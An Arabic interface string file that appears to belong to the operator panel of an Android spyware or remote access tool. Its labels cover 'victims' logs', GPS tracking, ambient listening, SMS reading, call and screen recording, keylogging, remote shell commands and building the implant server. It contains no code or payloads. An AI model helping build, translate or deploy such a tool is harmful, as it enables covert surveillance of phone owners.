--------------ar---------------
البورت
البــورت:> 1023
دخـول
خروج
الحقل لا يقبل إلا أرقام فقط
لا يمكنك استخدام بورت أقل من 1023 إلا إذا كنت من مستخدمين الجذر!
سجل المكالمات
التطبيقات المثبتة
معلومات الجهاز
لوحة المفاتيح 
لوحة المرح
نظام تحديد المواقع العالمي (GPS)
الاستماع إلى محيط الهاتف
قراءة رسائل SMS
أوامر عن بعد
مدير الملفات
دفتر العناوين
قائمة واي فاي
الحافظة
مدير عمليات
أرسل رسالة نصية قصيرة
مدير التحميل
التحكم في الإشعارات
خلفية الشاشة
كشف وجوه سامسونج 
تسجيل المكالمات
مسجل الشاشة
هوية الجهاز
الايبي
الكام
نسخة الاندرويد
نوع الجهاز
البلد
رقم النسخه
الصانع
الرقم التسلسل
مستخدم
تحميل
تحميل
سجلات الضحايا
اوامــر شل
الاداء
إعادة تشغيل
إزالة الغير متصل
غير متصل /متصل
المتصلين /اونلاين
صندوق
الخادم
نسخ
خادم إعادة تشغيل
إلغاء تثبيت
أدوات
مساعدة
التنزيلات صندوق
بناء الخادم
إعدادات
حول مفكرةالتجسس
TB
GB
MB
KB
B
عدد السطور
اضف ملف
أدخل اسم الملف
ملف جديد
إضافة
اسم
اسم الحزمة
فتح
معلومات اكثر حول التطبيق
الغاء التثبيت
اسم
رقم الهاتف
إضافة اسم
حذف اسم
اعادة تنشيط
دقة الشاشة :
اعادة تنشيط
عرض في الاتصال
رقم الهاتف
نوع الاتصال
اسم \ تاريخ الاتصال
وقت المكالمة
نسخ
إرسال
لقطة شاشة
توقف
صلة
مسار ومجلد جديد
عنوان
وصف
اسم الملف
اسم الملف
خطأ 
أرسلت
هوية الجهاز
اسم الملف
حجم
مسار الملف
فتح باستخدام
حذف
حذف جميع
فتح الملف
المتصفح
لا يمكن ايجاد الملف
قد لا يكشف عن وجوه
تم الكشف عن وجوه
اسم
حجم
ملف
تحميل
الفتح بأستخدام
إعادة تسمية
حذف
اعادة تنشيط
ملف جديد
قراءة
مجلد
آخر
يتعذر فتح هاذا الملف : 
لا يمكن تحميل هذا المجلد
ملف بهذا الاسم موجود بالفعل، هل ترغب في استبدال؟
قراءة>
Text.txt
ملف جديد
إحداثيات الموقع الضحية:
الموقع: 
التسجيل
توقف
استماع
حفظ
لا ملف
تسجيل
إيقاف تسجيل الرجاء الانتظار ...
استماع ...
ينتهي بنجاح
غير محدد
توقفت
توقف
استماع
المسح الضوئي إلى الأمام
عكس المسح الضوئي
التخزين المؤقت
انتظار
المالية المنتهية فى وسائل الإعلام
الانتقال
جاهز
إعادة الاتصال
آخر
غير معروف الدولة:
أرجو الإنتظار ...
إرسال
كلاسيكي
أسود
نافذة التنبيه
رابط
تشغيل صامت
نغمات
وسائط
إعلام
النظام
تحميل الإعدادات ...
اعادة تنشيط
ارسال اهتزاز
الموقت:
الرسالة
تشغيل الروابط
شريط الهاتف
الأصوات والإشعارات
اهتزاز
زر الخروج تعطيل
إضافة جهة اتصال
أدخل اسم
أدخل رقم
إضافة
الحصول على إشعار
تفريغ المخزن
يلتقي
عن النظام
<البطارية
اسم
اسم الحزمة
حزمة النظام
حجم
قتل
اعادة تنشيط
حفظ
إعادة تسمية
إعادة تسمية
اعادة تسمية
المكالمات المسجلة
حجم
بدء ميزة تسجيل
توقف ميزة تسجيل
نص الرسالة
رقم هاتف
إرسال
أرجو الإنتظار...
نسخ
قطع
الصق
اختر الكل
تراجع
حسنا
المتصفح
إشعار خادم دخول
إشعار الصوت عند الحصول على عميل جديد
إضافة
اللغات
حفظ
لوحة التحكم
عدد السطور
عدد السطور
عدد السطور
اسم:
 غير معروف 
لا يمكن ايجاد الملف
عدد السطور
عدد السطور
نسخ:
عدد السطور
ميزة تسجيل المكالمات لم تتنشط حتى الان
عدد السطور
التنزيلات صندوقي>
 غير معروف
اسم:
عدد السطور
هل تريد فتح هذا الرابط
عدد السطور
نسخ
قطع
الصق
اختر الكل
تراجع
نظيف
اسم التطبيق :
مضيف :
البورت:
اسم الخادم :
اسم الإصدار:
أيقونة
بناء
بناء>
بناء خادم
تقبل أرقام فقط
المظهر>
تفاصيل
قائمة
حظر خادم
القائمة السوداء
إرسال القائمة السوداء
القائمة السوداء
حفظ
البحث
نسخ الملف
مشاهدة الكل
اغلاق
إلى أقصى حد
الحد الأدنى
استعادة إلى الأسفل
التنزيلات
DCIM
نغمات
أفلام
الصور
موسيقى
الإشعارات
المدونة الصوتية
إزالة
الوثائق
اعادة تنشيط
تحميل
حذف
حفظ
نسخ
نسخ
قطع
الصق
اختر الكل
تراجع